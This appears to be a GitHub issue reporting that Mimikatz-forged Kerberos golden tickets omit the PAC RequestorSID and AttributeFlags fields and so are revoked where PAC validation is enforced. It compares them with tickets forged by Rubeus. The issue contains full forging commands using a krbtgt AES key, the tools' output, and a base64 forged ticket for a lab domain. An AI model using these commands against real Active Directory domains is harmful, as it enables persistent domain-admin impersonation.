Mimikatz Golden Ticket fails to create PAC attribute RequestorSID
g4uss47 opened this issue · comments
Summary
I was getting errors using a golden ticket created with Mimikatz of KDC_TGT_Revoked and led me to an investigation to find out that the golden ticket created by mimikatz was failing to create the PAC field correctly, it is not properly setting the RequestorSID and the AttributeFlags how it should, even when the program claims it is doing so.
This was done in an environment in which PAC validation is enforced and therefore since the RequestorSID field is empty, the PAC validation fails and the golden ticket is revoked.
Replication Steps
Mimikatz Golden Ticket
I first generate a mimikatz golden ticket for a user called willywonka:
kerberos::golden /domain:chocolatefactory.local /user:willywonka /sid:S-1-5-21-2377760704-1974907900-3052042330 /id:2000 /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ticket:golden_mimikatz.kirbi
And the execution claims that the PAC is generated and signed:
User : willywonka
Domain : chocolatefactory.local (CHOCOLATEFACTORY)
SID : S-1-5-21-2377760704-1974907900-3052042330
User Id : 2000
Groups Id : *513 512 520 518 519
ServiceKey: ea2344691d140975946372d18949706857eb9c5f65855b0e159e54260beb365c - aes256_hmac
Lifetime : 18/04/2024 22:07:32 ; 16/04/2034 22:07:32 ; 16/04/2034 22:07:32
-> Ticket : golden_mimikatz.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
However, as i said previously this golden ticket was giving me the KDC_TGT_Revoked error, so i investigated and used rubeus to take a look at what was actually inside the ticket:
.\Rubeus.exe describe /ticket:golden_mimikatz.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Describe Ticket
ServiceName : krbtgt/chocolatefactory.local
ServiceRealm : chocolatefactory.local
UserName : willywonka (NT_PRINCIPAL)
UserRealm : chocolatefactory.local
StartTime : 18/04/2024 22:02:54
EndTime : 16/04/2034 22:02:54
RenewTill : 16/04/2034 22:02:54
Flags : pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : yakUMo5Akb7g+D8UayZrl3rn8iaSkX6fULGG/yD1LRk=
Block One Plain Text : 6384000003613084
Decrypted PAC :
LogonInfo :
LogonTime : 18/04/2024 22:02:54
LogoffTime :
KickOffTime :
PasswordLastSet :
PasswordCanChange :
PasswordMustChange :
EffectiveName : willywonka
FullName :
LogonScript :
ProfilePath :
HomeDirectory :
HomeDirectoryDrive :
LogonCount : 0
BadPasswordCount : 0
UserId : 2000
PrimaryGroupId : 513
GroupCount : 5
Groups : 513,512,520,518,519
UserFlags : (0) 0
UserSessionKey : 0000000000000000
LogonServer :
LogonDomainName : CHOCOLATEFACTORY
LogonDomainId : S-1-5-21-2377760704-1974907900-3052042330
UserAccountControl : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
ExtraSIDCount : 0
ResourceGroupCount : 0
ClientName :
Client Id : 18/04/2024 22:02:54
Client Name : willywonka
ServerChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : 6B2DD580E09D063955E48C0E (VALID)
KDCChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : AC649E0CC12A895B62D559F6 (VALID)
As we can see in the contents of the ticket the Attribute Flags and RequestorSID are missing.
Rubeus Golden Ticket
In order to make a comparison I generated the same golden ticket using Rubeus:
.\Rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /user:WillyWonka /id:2000 /domain:chocolatefactory.local /sid:S-1-5-21-2377760704-1974907900-3052042330 /displayname:"Willywonka" /netbios:WILLYWONKA /dc:dc1.chocolatefactory.local /outfile:golden_rubeus.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Build TGT
[*] Building PAC
[*] Domain : CHOCOLATEFACTORY.LOCAL (WILLYWONKA)
[*] SID : S-1-5-21-2377760704-1974907900-3052042330
[*] UserId : 2000
[*] Groups : 520,512,513,519,518
[*] ServiceKey : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : chocolatefactory.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'WillyWonka@chocolatefactory.local'
[*] AuthTime : 18/04/2024 22:14:11
[*] StartTime : 18/04/2024 22:14:11
[*] EndTime : 19/04/2024 8:14:11
[*] RenewTill : 25/04/2024 22:14:11
[*] base64(ticket.kirbi):
doIF/DCCBfigAwIBBaEDAgEWooIExzCCBMNhggS/MIIEu6ADAgEFoRgbFkNIT0NPTEFURUZBQ1RPUlku
TE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFmNob2NvbGF0ZWZhY3RvcnkubG9jYWyjggRrMIIEZ6AD
AgESoQMCAQOiggRZBIIEVSh74J4V+nesazrzIzWkFQcjoy/ECP4XYxkfAuKtbemKZTHQ9HqhndHk0UJN
q3Kn76eNfF60PyaPz5Md17QbjxAEXISEvxXTLhiPDXTPLTLwe3fK2UpbxMBoFtfcAJIQnICr/+/eswuT
WC2+x4vMYmotwsuMokHcTh9CsLchlUTD72w/hk1kfDVJk2MsS/9+lwqsuQi/jMvwlulttxlkZL7dFxXC
RGmgca+L2slkSJCmOzLKjposzpgcMn4kf+ea7i43C2drKMJDQlgAiKl8EwgSZacOyJ6b3V1LgYTR3Xld
0dLxH7ln4WbUPYPoBBQSLLv70yitxR1ddgfMjO+sRuanQ4KAvT9hn6efnfv7hIjWugjK4tmNOpwoF/fV
cwo04GJVN9hqvkSKv9WQpGzlkBNyVSjHMMlJtkFQG45GDI4BiEkKMP//j5yzD7AQvOaCC5JEfvhX+/PY
w1mu59Yt5gI/D98XnpyC8qFKdMF2JPpZUfrDF6W9dV7a0x3juiayXAI2OG5FqLmseTUCwrtA+07V8bK1
BuZ5eF5ouEaHdi5Bz9TVsnl/WPCsSU9QziiREzth1pl30uemvBzk7GT2Aqwe6wF4u4eP72w0sC1dLG2O
IGJTivxeWZ4cYlTuc2CyvUJmgKDGqM9NZXT0TUXHPO6pG/GQofD6s/qPUqqV0L9aoE/sMFuQCYvE9B6q
6kZjWkwlwSFn5Zh8SmrAhtf+uRtQptHq7tFGnOQKsNjXw6x9suNm5rA1zShwB/xTaAB0KCT2xEtS2r45
oCSdMWGbfZivpvnySfL6DAVGwfWmVGc44K26BS8hmofKC8sZ50L3SkqBIoresqRbbQW6wlYTIELZ4wws
yZbxi/hMMcIoFlbW2vE/csE/t32Y+zslJzLTGMVaTsD52NA509kg6uq7alyaWiOy0iyAf/GtiPi1uWy2
LhVpXuFn3qwyzMG8GzjTFGs6F7ap9YV1Kq0dpMTSNPW/AIyWsUJHSXWJTqnHcY8czHsFENuDRsJaoxzP
I17uholPNiyewOBvEJ3xFQq+4jIPPREKWO8LVTvNuMgOBcEFD0WjRoNZlThkNbeeOBSv8HW3haJyzW9M
YuRPHNc2Il+rM2qBFyrP9qMKlGrTAge1AJIVrnowLSftA9bO+y41NAIwXbnxbe2ZxnKkWMeaPdDxQ33K
CMc98HqkKHkb1oDOehqTRaiGzrpZ6k7dOHW0hNsdyaNplxrOUQiEDkMB3ermEa3rq46kaAHR4Oj9bu52
ceE+U5kcTSS5fx9OfHVh4OOw7rUyIDHRK6OJ4oaBDRnbzzwIeBTG4DKuqXk7AM7YHo/9wNUBG+fSRnRU
T0B7XrAiI6TchqeNSNAC0k0DwyEO50V6mNvxM4+izxOIFCnpYwDXyjRvg+epEhUDLthDb9M2wW/3pgeG
5nsN6fGuaEPa1ngWFHyJCMbjYqHjHbvXcZcVS8xNvFPT29GHHe57DJRfxEwfo4IBHzCCARugAwIBAKKC
ARIEggEOfYIBCjCCAQagggECMIH/MIH8oCswKaADAgESoSIEIHdWu0LMUacB7alGdNU+BMpiDxjOoLmw
OViutoIA0hMToRgbFkNIT0NPTEFURUZBQ1RPUlkuTE9DQUyiFzAVoAMCAQGhDjAMGwpXaWxseVdvbmth
owcDBQBA4AAApBEYDzIwMjQwNDE4MjAxNDExWqURGA8yMDI0MDQxODIwMTQxMVqmERgPMjAyNDA0MTkw
NjE0MTFapxEYDzIwMjQwNDI1MjAxNDExWqgYGxZDSE9DT0xBVEVGQUNUT1JZLkxPQ0FMqSswKaADAgEC
oSIwIBsGa3JidGd0GxZjaG9jb2xhdGVmYWN0b3J5LmxvY2Fs
And analysing it in the same fashion as the golden ticket generated by mimikatz
.\Rubeus.exe describe /ticket:golden_rubeus.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Describe Ticket
ServiceName : krbtgt/chocolatefactory.local
ServiceRealm : CHOCOLATEFACTORY.LOCAL
UserName : WillyWonka (NT_PRINCIPAL)
UserRealm : CHOCOLATEFACTORY.LOCAL
StartTime : 18/04/2024 22:03:08
EndTime : 19/04/2024 8:03:08
RenewTill : 25/04/2024 22:03:08
Flags : pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : NZ9U6rbvOS4pbfvj4uphZjm3T2wAdrIA6Grr/P/KFmo=
Block One Plain Text : 6382043530820431
Decrypted PAC :
LogonInfo :
LogonTime : 18/04/2024 22:03:08
LogoffTime :
KickOffTime :
PasswordLastSet :
PasswordCanChange :
PasswordMustChange :
EffectiveName : WillyWonka
FullName : Willywonka
LogonScript :
ProfilePath :
HomeDirectory :
HomeDirectoryDrive :
LogonCount : 0
BadPasswordCount : 0
UserId : 2000
PrimaryGroupId : 513
GroupCount : 5
Groups : 520,512,513,519,518
UserFlags : (0) 0
UserSessionKey : 0000000000000000
LogonServer : DC1
LogonDomainName : WILLYWONKA
LogonDomainId : S-1-5-21-2377760704-1974907900-3052042330
UserAccountControl : (16) NORMAL_ACCOUNT
ExtraSIDCount : 0
ResourceGroupCount : 0
ClientName :
Client Id : 18/04/2024 22:03:08
Client Name : WillyWonka
UpnDns :
DNS Domain Name : CHOCOLATEFACTORY.LOCAL
UPN : WillyWonka@chocolatefactory.local
Flags : (1) NO_UPN_SET
Attributes :
AttributeLength : 2
AttributeFlags : (1) PAC_WAS_REQUESTED
Requestor :
RequestorSID : S-1-5-21-2377760704-1974907900-3052042330-2000
ServerChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : F06ACD94A42E9BC2A49AA1F9 (VALID)
KDCChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : 512F28A02087A2D1896FB6A1 (VALID)
The AttributeFlags is properly set to PAC_WAS_REQUESTED and the RequestorSID is properly set